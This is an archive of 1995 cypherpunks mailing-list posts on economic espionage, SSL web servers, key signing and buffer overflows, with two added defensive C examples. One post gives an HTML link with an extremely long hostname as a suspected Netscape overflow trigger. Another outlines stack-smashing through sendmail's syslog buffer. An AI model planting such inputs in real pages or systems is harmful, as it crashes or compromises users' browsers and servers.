friend. No one can ever break you for doing something you don't do.

> The problem arises when you use information given to you from
> outside as the argument to popen or system without checking it.

Yup, but often, you'd be surprised what turns out to be outside data.

In any case, you obviously also understand why this is bad, but I hope
that people out there understand -- always make sure that you are
double extra careful about the use of such calls.

Perry
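
Added example, not from the original thread: one way to follow the advice above, in C. Instead of popen() or system(), which hand a string to /bin/sh, the helper forks and calls execve() with an absolute path, an argument vector and a fixed environment, so data inside an argument is never parsed as shell syntax; run_argv, the /bin/echo target and the sample argument are assumptions.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Shell-free replacement for popen(cmd, "r"): run argv[0] with the given
 * argument vector and capture its stdout in out (NUL-terminated, truncated
 * to cap - 1 bytes). Returns the exit status, or -1 on any failure.
 *
 * popen("/bin/echo seed; echo INJECTED", "r") would have /bin/sh run two
 * commands; here the same text is one argv element and is never parsed.
 */
int run_argv(char *const argv[], char *out, size_t cap)
{
    /* Fixed environment: nothing inherited from the caller (PATH, IFS, LD_*). */
    static char *const clean_env[] = { "PATH=/usr/bin:/bin", NULL };
    char sink[256];
    int fds[2], status;
    size_t used = 0;
    ssize_t n;
    pid_t pid;

    if (out == NULL || cap == 0)
        return -1;
    out[0] = '\0';
    if (argv == NULL || argv[0] == NULL || argv[0][0] != '/')
        return -1;                       /* absolute path only, no PATH search */
    if (pipe(fds) < 0)
        return -1;
    pid = fork();
    if (pid < 0) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    if (pid == 0) {                      /* child */
        close(fds[0]);
        if (fds[1] != STDOUT_FILENO) {
            if (dup2(fds[1], STDOUT_FILENO) < 0)
                _exit(127);
            close(fds[1]);
        }
        execve(argv[0], argv, clean_env);
        _exit(127);                      /* exec failed */
    }
    close(fds[1]);                       /* parent */
    while (used < cap - 1 &&
           (n = read(fds[0], out + used, cap - 1 - used)) > 0)
        used += (size_t)n;
    out[used] = '\0';
    while (read(fds[0], sink, sizeof sink) > 0)
        ;                                /* drain output beyond cap */
    close(fds[0]);
    while (waitpid(pid, &status, 0) < 0)
        if (errno != EINTR)
            return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed input: an argument carrying shell metacharacters. */
    char *const args[] = { "/bin/echo", "seed; echo INJECTED", NULL };
    char out[128];
    int rc = run_argv(args, out, sizeof out);

    printf("exit=%d output=%s", rc, out);
    return 0;
}
```

Other descriptors open in the parent are still inherited by the child unless they were opened close-on-exec, which is one more instance of "outside data" to account for.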




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 21 Sep 95 20:22:59 PDT
To: cypherpunks@toad.com
Subject: Re: economic espionage (@#$%^&*) (fwd)
Message-ID: <199509220334.WAA02419@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 21 Sep 1995 22:46:09 -0400 (EDT)
> From: Black Unicorn <unicorn@polaris.mindport.net>
> Subject: Re: economic espionage (@#$%^&*)
> > 
> > ah yes, just like the way Clinton alone came up with the whole
> > Clipper idea as a way to balance the legitimate goals
> > of law enforcement with the right to privacy in society.
> 
> Uh, how do you see balancing in the economic intelligence issue?
> Do you believe espionage is never justified?
> "Gentlemen don't read each other's mail" almost lost a war.
> 

All out espionage should, ideally at least, only take place if there is
evidence that a nation's independence is directly involved. By this I mean
active methods versus passive eavesdropping. It is one thing to send aloft
satellites to record cellular traffic between cars and quite another to
actively insert agents provocateur.

> 'Intelligence officials in the United States estimate that at least twenty 
> foreign nations are currently engaged in intelligence activities 
> "detrimental to our economic interests...."'
> 

I had hoped they were better investigators than this, only 20? Or perhaps
this is a truer indication of our national paranoia.

> 
> 'The White House Office on Science and Technology estimates losses to U.S. 
> businesses from foreign economic espionage at nearly one hundred billion 
> dollars per year.'
> 

What are its estimates on what US business gains with its present industrial
espionage infrastructure? Without these numbers the quoted above are
useless.

                                               Jim




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Thu, 21 Sep 95 19:45:37 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: economic espionage (@#$%^&*)
In-Reply-To: <199509211936.MAA23834@netcom13.netcom.com>
Message-ID: <Pine.SUN.3.91.950921221122.14509A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Sep 1995, Vladimir Z. Nuri wrote:

> 
> >> >It was said that Pres. Clinton had given a speech while 
> >> >visiting the  CIA HQ in Langley/Virginia. He allegedly 
> >> >said in this speech that obtaining  industrial 
> >> >informations has the highest priority and this were the 
> >> >new  task for the spies.
> 
> ah yes, just like the way Clinton alone came up with the whole
> Clipper idea as a way to balance the legitimate goals
> of law enforcement with the right to privacy in society.

Uh, how do you see balancing in the economic intelligence issue?
Do you believe espionage is never justified?
"Gentlemen don't read each other's mail" almost lost a war.

> 
> careful Bill, your strings are showing. and I won't say 
> who is the puppeteer, but he has the initials N.S.A.
>

You need to write a conspiracy book.

> pardon me, but this new "economic espionage" sleazoid-intelligence-
> agency-justifying bugaboo really annoys me.

You preferred it when they were funding gunrunning and hostage negotiation 
with drug profits and abetting smuggling?

> I would *die* to see an op-ed in the NYT with the subject:
> "economic espionage: the new bogeyman decoy after the cold war"

Uh, you've not been looking.  Many have criticised the new emphasis as 
justification in a threatless environment.

***

A very interesting note has been published on the subject just recently.
Interested parties might want to check out:

Augustini, Jeff, "From Goldfinger to Butterfinger: The Legal and Policy 
Issues Surrounding Proposals to Use the CIA for Economic Espionage,"
26 Law & Pol'y Int'l Bus. 2 (Law and Policy in International Business, The
International Law Journal of Georgetown University Law Center).


While the author misses some key points, goes off on a silly 
anti-trust tangent which totally misreads the current state of antitrust 
law, and makes some outright misses on the legal logistics of passing 
the information through government channels, the work also holds some 
interesting research about the programs of Japan, France, Germany and Israel.

Some Choice Parts:

'Intelligence officials in the United States estimate that at least twenty 
foreign nations are currently engaged in intelligence activities 
"detrimental to our economic interests...."'


'The White House Office on Science and Technology estimates losses to U.S. 
businesses from foreign economic espionage at nearly one hundred billion 
dollars per year.'


'Allegations within the French Government accuse U.S. personnel, including 
four diplomats, attempted to steal secret government documents relating 
to Franco-American trade disputes.'


'A classified CIA report lists two top Japanese intelligence priorities as 
(1); intelligence regarding access to foreign sources of raw material and 
(2) "detailed intelligence on technological and scientific developments 
in the United States and Western Europe."'


'In addition to intelligence operations abroad, the French are notorious 
for routinely eavesdropping on, and conducting "bag jobs" against, U.S. 
businessmen visiting France.  To conduct these "bag job" operations,
the French allegedly maintain an extensive network of part-time or 
volunteer informants known as "honorary correspondents," whose main tasks 
are to help the DGSE (French Intelligence) gain entry into hotel rooms, 
delay or distract targets, and provide an early warning system in cases 
where targets return early... placing electronic eavesdropping equipment 
on Air France flights between Paris and New York to listen in on 
traveling U.S. businessmen, attempting to plant moles in European 
branches of U.S. corporations, and wiretapping state-owned communications 
lines used by U.S. companies located in France.'


Most interesting for cypherpunks:

An ominous footnote #111 indicates that:  'While many American companies 
employ encryption equipment, under French law they must give the "keys" 
to the French government.  This allows the French Intelligence services to 
listen to encoded transmissions.'


If anyone wants a fuller summary, I'll post it to the list with enough 
interest.


Moral:  Even a clueless Law Student comments on intelligence better than 
"Vlad."

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Tang <altitude@cic.net>
Date: Thu, 21 Sep 95 20:23:17 PDT
To: rmtodd@servalan.servalan.com (Richard Todd)
Subject: Re: "Gnusaic"? Why not a Gnu-Style Web Browser?
In-Reply-To: <m0svxOg-000772C@servalan.servalan.com>
Message-ID: <199509220323.XAA09674@petrified.cic.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu Sep 21 21:59:00 1995: you scribbled...
> 
> In servalan.mailinglist.cypherpunks Tim May writes:
> >Why not a Gnu-style Web browser? I don't know if the original Mosaic can be
> >used and added to, but I can imagine something like this could be done.
> 
> As for Web servers, you can
> get the source code for Plexus or CERN httpd off the net.  Plus, doesn't
> Eric Young have someone's httpd already hacked to include SSL-compliant
> encryption?

Yes.  This has been done.  A set of patches for NCSA's HTTPd (for US 
folks only) can be found at

	http://petrified.cic.net/~altitude/ssl/howto.html

I got the patches from the ssleay gang in AU, but i haven't seen them on
their ftp site yet, so if you're outside the states, it'll be available
rsn (i think...)

> The question becomes why don't the free WWW software people out there now
> support crypto?  Maybe they're simply not expert in or interested in crypto,
> or maybe they don't want to mess with the ITAR hassles. 

Well, I have been trying for the last 3 months to put together a "free"
WWW server to both commercial and non-commercial institutions in the
states (I'm only concerned about people in the states for now because most
of the important issues are moot if you're outside of the states).

The main problems that I've run into are:

   * Crypto is a difficult topic to understand:
       I didn't know anything about crypto when i started.  It's taken me
       this long to start understanding the fundamental concepts and such.
       And i'm still really in the dark about a lot of it.

   * Specific information about crypto, (especially licensing and other
     legal stuff) is difficult to find.
       Since there are so many patents/trade secrets regarding crypto
       libraries/algorithms/protocols, any developer MUST deal with the
       corresponding companies.  That process is long and painful.

   * Money
       There are bound to be legal problems, for example, the RC4
       situation.  According to everything I've heard, it is legal to use
       RC4 because it doesn't have trade secret status anymore.
       Unfortunately, RSA will most likely bring suit to anyone who tries.  

   * ITAR
       'Nuff said.

As for my plan to "provide" a ssl'ized web server, my plan is to put
together a "package" which contains NCSA's HTTPd, SSLeay, and a version of
RSARef.   I would only charge whatever the licensing costs were to me
(There's a minimum $20 cost for the commercial RSARef from Consensus, and
I'm still working on the RC4 licensing).

Oh yeah, one other problem is that companies like RSA are completely
unaccustomed to dealing with people providing "free" products.  For
example, at first, RSA kept asking me for a "Business Plan" so that we
could work out a percentage royalty that I would pay them for RC4
licensing.  They were completely aghast when i said that I wanted to
provide it for free.  They pointed me to RSARef, but i told them that i
wanted to provide it for commercial institutions too, so they asked for
business plan, and the cycle continued....  (I've started working with
them again, so things are progressing for now...).  I know that I don't
really have to go through the RC4 licensing with RSA, but i don't have the
money to buy dinner, let alone go head to head with RSA in court.

anyway, if y'all are interested, more info can be found at
http://petrified.cic.net/~altitude/ssl/ssl.saga.html.  I'd be happy to
answer questions, but seeing the knowledge level on the cp list, i feel
sort of inferior.

Thanx.

...alex...

     Alex Tang  altitude@cic.net   http://petrified.cic.net/~altitude
   CICNet: Unix Support / InfoSystems Services / WebMaster / Programmer
       Viz-It!: Software Developer (Check out http://vizit.cic.net)
  UM-ITD: TaX.500 Developer (Check out http://petrified.cic.net/tax500)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Thu, 21 Sep 95 20:53:28 PDT
To: cypherpunks@toad.com (Good Guys)
Subject: Cypherpunks, Sun and JAVA
Message-ID: <199509220353.XAA02204@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


Today at the Sun JAVA presentation in NYC.. Sun staff member
Hal Stern who was talking about security mentioned Cypherpunks..
when talking about Thomas Jefferson saying roughly that Jefferson
would be one if he was alive.

He might read this list (Hi Hal!).

Anyway he gave a good talk on security and actually seemed to
be aware of many of the issues.

/hawk
-- 
                Harry Hawk
                Manager of Computer Services
                Warwick Baker & Fiore
                212 941 4438
                habs@warwick.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Thu, 21 Sep 95 21:57:18 PDT
To: cypherpunks@toad.com
Subject: NSCP: Unch..vol rises...morn selling
Message-ID: <199509220457.VAA09524@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Volume Rose.
Morning selling.
Afternoon buying.

It's now a good bull, bear tussle.
I'd sure speculate on the "patch" 
until tomorrow afternoon. If not 
there, by 2:00 unload any position.

This is a good day trading stock for now.
Lots & lots of movement.


Symbol        : NSCP        Exchange    : NASDAQ

Description   : NETSCAPE COMMUNICATIONS CORP COM             

Last Traded at: 58 3/4      Date/Time   : Sep 21  4:00   
$ Change      : 0           % Change    : 0.000000    

Bid           : 58 3/4      Ask         : 59          
Volume        : 436900      # of Trades : 550         
Opening Price : 55          Last Shares : 5           
Day Low       : 54 1/4      Day High    : 59 1/8      
52 Week Low   : 45 3/4      52 Week High: 74 3/4 
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Thu, 21 Sep 95 21:04:51 PDT
To: cypherpunks@toad.com
Subject: Netscape RNG
Message-ID: <v01520c05ac87bbe891da@[199.227.2.142]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I'd like to see the Netscape RNG implemented as a plug-in, preferably
with sample source included to make it easier for other people to create
compatible plugins.

Once there was a published API for the RNG, other apps could use it as well.

I like the option of using a cypherpunks approved RNG.  No offense to
Netscape, but I'd feel a lot more comfortable using a RNG with say
Perry's signature or Matt Blaze's.

jpb
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Thu, 21 Sep 95 21:05:16 PDT
To: cypherpunks@toad.com
Subject: Miami FL key signing
Message-ID: <v01520c06ac87be682849@[199.227.2.142]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I'm interested in setting up a key-signing in the Miami-Ft. Lauderdale
area on 28 or 29 October.

Location is flexible, but the date isn't very - a friend of mine is going
to be in town from Down Under from some time on the 27th to the morning
of the 31st and he'd like to snag as many signatures on his key as possible.

Joseph Block <jpb@miamisci.org>

"The subjection to which the American citizen is now exposed every day
of his life is so great that the whole idea of liberty ("That which
does not injure one's neighbor") is almost totally lost. The greatest
of despots, Louis XIV, never told his subjects what they could or
could not eat and drink, and he never told them how to conduct their
private lives."
- -- Jeff Cooper
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 22 Sep 95 00:11:25 PDT
To: cypherpunks@toad.com
Subject: Re: economic espionage (@#$%^&*)
Message-ID: <199509220711.AAA02426@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>>> >It was said that Pres. Clinton had given a speech while 
>>> >visiting the  CIA HQ in Langley/Virginia. He allegedly 
>>> >said in this speech that obtaining  industrial 
>>> >informations has the highest priority and this were the 
>>> >new  task for the spies.

Dr. John Deutsch, speaking to the National Press Club, also mentioned
economic espionage, with the State Department as a primary
customer, but was concerned about definitions of goals, etc.
He did reassure the NPC that the CIA would continue to work with
drug dealers and corrupt South American military and other scum
who have information to sell, as well as cooperating more closely 
with the FBI and DEA, but on the other hand he does apparently
view domestic operations as clearly outside the CIA's job.
One set of content in his speech was the planned combination of
the various satellite data interpretation organizations
into one group of CIA/Pentagon/NRO/NSA/etc.

ObCrypto: One questioner asked him about the growing use
of encoding and would the CIA be able to keep up eavesdropping on
people.  "We're very good at eavesdropping" was his main reply;
he did acknowledge that there was an issue but didn't go into 
the party line about needing to have escrow to get GAK.

Clinton, meanwhile, reassured guests at a $1000/plate fundraising 
lunch that the Republicans' economic plans would mainly affect
the poor and wouldn't trouble the rich too much...   :-)
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 21 Sep 95 21:18:18 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape RNG
Message-ID: <v02120d05ac87e8be0390@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:04 AM 9/22/95, Joe Block wrote:

>I'd like to see the Netscape RNG implemented as a plug-in, preferably
>with sample source included to make it easier for other people to create
>compatible plugins.

This sounds like a job for.... CyberDog!!!

Well, OpenDoc, anyway. How 'bout Mozilloids? Any plans for OpenDoc parts in
the works? There's talk on micp about making PGP parts...

Cheers,
Bob Hettinga

I know, I know, If you told me, you'd have to kill me...



-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 21 Sep 95 21:43:51 PDT
To: tomw@cthulhu.engr.sgi.com
Subject: Re: netscape bug
In-Reply-To: <199509212242.PAA04533@orac.engr.sgi.com>
Message-ID: <199509220443.AAA02254@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Tom Weinstein writes:
> While it is certainly true that you can stomp on memory in static
> buffers, it's not clear that you can execute whatever code you insert
> there.  If the buffer happens to be allocated off the stack (and the
> stack grows down) then you can modify the return address.  Of course,
> you have to know the address of whatever code you want to execute.

Let's say, Mr. Weinstein, that you shove some code onto the stack along
with the return address, and the address happens to be the code.

If you don't believe it can be done, it's easy enough to demonstrate it
on your machines, which I believe suffer from the syslog(3) bug, which
your company hasn't patched so far as I know, and which afflicts the
Sendmail daemons you ship with your machines. See the recent 8lgm bug
report if you want details.

> Of course, that also assumes that you can execute from the data area
> which is not always true.

It's usually true on modern machines -- it's very difficult to rig
things otherwise given the way that lots of the dynamic loading works
these days.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Thu, 21 Sep 95 21:52:19 PDT
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: economic espionage (@#$%^&*) (fwd)
In-Reply-To: <199509220334.WAA02419@einstein.ssz.com>
Message-ID: <Pine.SUN.3.91.950922005006.16886A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Sep 1995, Jim Choate wrote:

> 
> Forwarded message:
> 
> > Date: Thu, 21 Sep 1995 22:46:09 -0400 (EDT)
> > From: Black Unicorn <unicorn@polaris.mindport.net>
> > Subject: Re: economic espionage (@#$%^&*)
> > > 
> > > ah yes, just like the way Clinton alone came up with the whole
> > > Clipper idea as a way to balance the legitimate goals
> > > of law enforcement with the right to privacy in society.
> > 
> > Uh, how do you see balancing in the economic intelligence issue?
> > Do you believe espionage is never justified?
> > "Gentlemen don't read each other's mail" almost lost a war.
> > 
> 
> All out espionage should, ideally at least, only take place if there is
> evidence that a nation's independence is directly involved. By this I mean
> active methods versus passive eavesdropping. It is one thing to send aloft
> satellites to record cellular traffic between cars and quite another to
> actively insert agents provocateur.

Not all agents are agents provocateur.  Human Intelligence is often 
required to determine if the criteria you cite above are present.


> > 
> > 'The White House Office on Science and Technology estimates losses to U.S. 
> > businesses from foreign economic espionage at nearly one hundred billion 
> > dollars per year.'
> > 
> 
> What are its estimates on what US business gains with its present industrial
> espionage infrastructure? Without these numbers the quoted above are
> useless.

The distinction is in the difference between private and government 
sponsored espionage and intelligence.

Most of the French activity is, for example, government sponsored.  As is 
most of the Japanese activity.  U.S. activity is mostly private, by 
corporations and such.

I believe the numbers above are quite helpful really, in identifying 
scope, and demonstrating a need for counterespionage.


> 
>                                                Jim
> 
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 21 Sep 95 22:12:06 PDT
To: perry@piermont.com
Subject: Re: netscape bug
In-Reply-To: <199509220443.AAA02254@frankenstein.piermont.com>
Message-ID: <199509220511.BAA00235@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  Maybe I'm missing something here, but I don't see it. While it is easy
to use the "overwrite buffer and stomp on stack" method to execute code
for programs written as so


void foo(char* inputdata)
{
  char blah[X];
  write_to_buffer_without_knowing_length(inputdata, blah);
}

How would you do it for a program rewritten as

void foo(char* inputdata)
{
  char* blah;
  blah=PMalloc(X);
  write_to_buffer_without_knowing_length(inputdata, blah);
}

Where PMalloc acts like malloc, but from a separate heap. Two
other conditions further hold. All variables in this separate heap
are viewed as "tainted" since they came from user input, and can not
be used as arguments to system(), popen(), fopen(), etc.

Given this, I don't see how it is possible to cause code to be executed.
For one thing, you can't modify the stack. Secondly, since buffers
can't be used as arguments for i/o calls, overwriting nearby buffers like
char *program_path = "auxillary_program" to "/bin/csh" won't do you any
good. (note: a pointer variable should never point to data on the stack
anyway. I'm glad Java eliminated stack data. Pointers to stack data 
are the source of numerous bugs in C. There is a minor performance gain
to having the compiler generate the stack allocation rather than
call malloc(), but it's not worth it. Stack data has the benefit that
it is automatically deallocated upon function return. My answer is
to simply use C++ to achieve this with dynamically allocated resources)


I for one, never use scanf(), gets(), or anything that doesn't know the
size of the destination storage. It's plain stupid. I was tutoring
a student today who had allocated a 20-byte buffer on the stack and
used scanf to ask for a filename. Sheesh.

One thing that should set off alarm bells immediately whenever you're
coding is a fixed size buffer justified with the idea "no one could
ever use more than Y resources." Yeah, no one could ever use more
than 11 character file names. 640K ram. 32-bit IP address space. etc, etc.
If not for security, then for simple future flexibility.


-Ray
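
A sketch of the separate-heap idea proposed in the message above, as an added example (not Ray's code): user input is copied into its own arena, any pointer into that arena counts as tainted, and a wrapper refuses tainted arguments to fopen(). The names pmalloc, is_tainted, taint_copy and checked_fopen and the 4096-byte arena size are assumptions made for the illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ARENA_SIZE 4096  /* assumed size, chosen for the illustration */

/* All user-supplied data lives in this one region, away from the stack. */
static unsigned char arena[ARENA_SIZE];
static size_t arena_used;

/* Bump allocator over the tainted arena; returns NULL when it is full. */
void *pmalloc(size_t n)
{
    void *p;
    size_t aligned = (n + 15u) & ~(size_t)15u;  /* keep 16-byte alignment */

    if (n == 0 || aligned < n || aligned > ARENA_SIZE - arena_used)
        return NULL;
    p = arena + arena_used;
    arena_used += aligned;
    return p;
}

/* A pointer is tainted if it points anywhere inside the arena. */
int is_tainted(const void *p)
{
    uintptr_t a = (uintptr_t)p, lo = (uintptr_t)arena;

    return a >= lo && a < lo + ARENA_SIZE;
}

/* Copy user input into a fresh tainted buffer. The allocation is sized from
 * the input, so the copy cannot run past it. */
char *taint_copy(const char *input)
{
    size_t n = strlen(input) + 1;
    char *buf = pmalloc(n);

    if (buf != NULL)
        memcpy(buf, input, n);
    return buf;
}

/* fopen() wrapper that refuses any argument taken from the tainted arena. */
FILE *checked_fopen(const char *path, const char *mode)
{
    if (is_tainted(path) || is_tainted(mode))
        return NULL;
    return fopen(path, mode);
}

int main(void)
{
    char *user_path = taint_copy("/etc/passwd");  /* constructed sample input */

    printf("tainted: %d\n", is_tainted(user_path));
    printf("refused: %d\n", checked_fopen(user_path, "r") == NULL);
    printf("literal tainted: %d\n", is_tainted("config.txt"));
    return 0;
}
```

The range check only covers pointers into the arena: once bytes are copied out into ordinary memory the taint is lost, and an unbounded write into one arena buffer can still damage its tainted neighbours.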



   







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 21 Sep 95 22:19:47 PDT
To: David Van Wie <dvw@hamachi.epr.com>
Subject: Re: Patents and trade secrets was: Encryption algorithms used in PrivaSoft
In-Reply-To: <306216B6@hamachi>
Message-ID: <199509220519.BAA02311@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



David Van Wie writes:
> > Does this mean that prior art would no longer invalidate a patent?
> 
> No.  It just moves the prior art date from the date of invention to the date 
> of filing the patent application.

Can you explain that? It doesn't make much sense...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 21 Sep 95 22:38:08 PDT
To: tomw@cthulhu.engr.sgi.com
Subject: Re: netscape bug
In-Reply-To: <199509220503.WAA05140@orac.engr.sgi.com>
Message-ID: <199509220537.BAA02346@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Tom Weinstein writes:
> > Let's say, Mr. Weinstein, that you shove some code onto the stack along
> > with the return address, and the address happens to be the code.
> 
> I never disputed that it could be done, I was just uncertain as to how
> easy it would be.

It's pretty obvious.

> > If you don't believe it can be done, it's easy enough to demonstrate it
> > on your machines, which I believe suffer from the syslog(3) bug, which
> > your company hasn't patched so far as I know, and which afflicts the
> > Sendmail daemons you ship with your machines. See the recent 8lgm bug
> > report if you want details.
> 
> Hmm, could you explain how to exercise this bug?  Perhaps a sample
> program?

I can tell you in general terms -- I don't write MIPS assembler
myself. However, I will point out to you that you use an ancient
Sendmail, and that it uses syslog(3) on user produced data, and that
syslog uses a static buffer. Trick sendmail into logging something
very big, and you can do what you like. The 8lgm people wrote a demo
for Sparc as a proof of concept.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 21 Sep 95 23:12:30 PDT
To: cypherpunks@toad.com
Subject: Another Netscape Bug (and possible security hole)
Message-ID: <199509220612.CAA11441@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



I've found a Netscape bug which I suspect is a buffer overflow and
may have the potential for serious damage. If it is an overflow bug,
then it may be possible to infect every computer which accesses a web
page with Netscape. To see the bug, create an html file containing
the following:

<a href="http://foo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.fo!
 o.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo/foo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.!
 bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo

